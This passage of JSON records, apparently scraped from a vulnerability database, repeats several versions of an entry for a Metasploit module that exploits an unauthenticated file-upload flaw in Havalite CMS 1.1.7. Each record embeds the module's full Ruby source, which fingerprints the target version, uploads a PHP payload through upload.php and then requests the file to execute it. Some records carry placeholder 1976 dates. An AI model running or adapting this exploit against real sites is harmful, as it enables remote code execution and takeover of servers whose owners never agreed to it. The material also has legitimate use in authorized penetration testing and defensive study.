end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-08-09T11:10:02", "differentElements": ["modified", "published"], "edition": 58}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This 
module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-08-12T19:27:31", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-08-12T19:27:31", "differentElements": ["modified", "published"], "edition": 59}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This 
module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-08-12T23:28:37", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-08-12T23:28:37", "differentElements": ["modified", "published"], "edition": 60}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This 
module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-08-19T13:26:25", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-08-19T13:26:25", "differentElements": ["modified", "published"], "edition": 61}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This 
module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-08-19T15:27:00", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-08-19T15:27:00", "differentElements": ["modified", "published"], "edition": 62}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This 
module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-08-19T17:25:31", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-08-19T17:25:31", "differentElements": ["modified", "published"], "edition": 63}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This 
module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-08-19T19:26:55", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-08-19T19:26:55", "differentElements": ["modified", "published"], "edition": 64}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This 
module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-09-10T07:52:31", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not 